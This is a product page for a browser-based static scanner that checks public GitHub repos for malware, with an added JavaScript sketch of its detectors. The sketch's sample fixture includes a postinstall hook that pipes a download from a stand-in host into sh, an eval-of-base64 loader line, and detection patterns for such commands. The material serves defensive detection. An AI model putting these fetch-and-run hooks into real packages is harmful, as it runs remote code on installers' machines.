by NOCTIS
Static analysis · Read-only

Repo Malware Scanner

Static analysis of a public GitHub repo for build-time code execution, supply-chain evasion, and obfuscation. Nothing is cloned, installed, or run.

How it works

Four reads, zero execution.

The scan happens entirely in your browser. We never clone the repo, never run npm install, never execute a single line of its code. We just read files over the public GitHub API and look for known malware patterns.

  1. You paste a GitHub URL

     Optionally a token — yours, stored only in your browser, used to raise GitHub's rate limit on your behalf.

  2. We list the repo through GitHub's public API

     Same thing your browser does when you open the repo page. No cloning, no downloads to disk.

  3. Four detectors scan the files in parallel

     Static pattern matching, no AI. Each detector looks for one specific class of attack.

  4. Findings are graded and shown

     High / medium / low / info — with the file, line, and the exact code that triggered the rule.
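To make steps 3 and 4 concrete, here is an added example, written for this page and not NOCTIS's code or the scanner's real rule set. It sketches two of the detector classes the page names (build-time code execution via npm lifecycle scripts, and obfuscation via decoded payloads fed to eval) as pure pattern matching over text that has already been fetched, and grades each hit with the file, line and triggering code. The rule names, severity thresholds, regular expressions and the sample repo contents are all assumptions constructed for the illustration; the actual detectors are not published on this page.

```javascript
// Added example (not NOCTIS's code): two toy static detectors that never
// execute anything, only read text. Rule names and thresholds are assumptions.

// npm runs these hooks automatically during `npm install`, so a command here
// is build-time code execution by construction.
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
// Fetch-and-run or inline-eval commands inside a hook raise severity to high.
const REMOTE_EXEC = /\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b|\bnode\s+-e\b|\bpowershell\b/i;

// Locate the first line containing `needle`; returns 1-based line and trimmed code.
function lineOf(text, needle) {
  const lines = text.split("\n");
  for (let i = 0; i < lines.length; i++) {
    if (lines[i].includes(needle)) return { line: i + 1, code: lines[i].trim() };
  }
  return { line: 0, code: "" };
}

// Detector 1: build-time code execution through package.json lifecycle scripts.
function scanPackageJson(file, text) {
  const findings = [];
  let pkg;
  try { pkg = JSON.parse(text); } catch { return findings; } // unparseable: nothing to grade
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE) {
    if (typeof scripts[hook] !== "string") continue;
    const where = lineOf(text, `"${hook}"`);
    findings.push({
      severity: REMOTE_EXEC.test(scripts[hook]) ? "high" : "medium",
      rule: "npm-lifecycle-script",
      file, line: where.line, code: where.code,
    });
  }
  return findings;
}

// Detector 2: obfuscation. A decoded string handed straight to eval/Function is
// graded high; a long base64-looking literal on its own is only low (info-like).
const EVAL_DECODED = /\b(eval|Function)\s*\(.*\b(atob|Buffer\.from)\s*\(/;
const B64_BLOB = /["'`][A-Za-z0-9+/]{120,}={0,2}["'`]/;

function scanForObfuscation(file, text) {
  const findings = [];
  text.split("\n").forEach((raw, i) => {
    const code = raw.trim();
    if (EVAL_DECODED.test(code)) {
      findings.push({ severity: "high", rule: "eval-decoded-payload", file, line: i + 1, code });
    } else if (B64_BLOB.test(code)) {
      findings.push({ severity: "low", rule: "long-base64-literal", file, line: i + 1, code });
    }
  });
  return findings;
}

// Route each fetched file (path -> text) to the matching detector, then sort
// findings so the highest severity is shown first.
const ORDER = { high: 0, medium: 1, low: 2, info: 3 };
function scanRepo(files) {
  const out = [];
  for (const [file, text] of Object.entries(files)) {
    if (file.endsWith("package.json")) out.push(...scanPackageJson(file, text));
    else if (/\.(m?js|cjs)$/.test(file)) out.push(...scanForObfuscation(file, text));
  }
  return out.sort((a, b) => ORDER[a.severity] - ORDER[b.severity]);
}

// Constructed sample repo contents for the demo; not taken from any real project.
const SAMPLE_FILES = {
  "package.json": [
    "{",
    '  "name": "demo",',
    '  "scripts": {',
    '    "postinstall": "curl -s http://example.invalid/x.sh | sh",',
    '    "prepare": "node scripts/build.js",',
    '    "test": "jest"',
    "  }",
    "}",
  ].join("\n"),
  "lib/loader.js": [
    "const cfg = require('./cfg');",
    "eval(Buffer.from(cfg.blob, 'base64').toString());",
    "module.exports = cfg;",
  ].join("\n"),
};

if (typeof require !== "undefined" && require.main === module) {
  console.table(scanRepo(SAMPLE_FILES));
}
```

In the browser the `files` map would be filled from the GitHub contents API responses rather than the constructed `SAMPLE_FILES`; the detectors themselves need nothing but strings, which is what keeps the "zero execution" property intact.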

What the detectors check

No API keys of ours are used. No backend. Nothing you scan touches our servers — the whole tool is a static page plus your browser calling GitHub directly.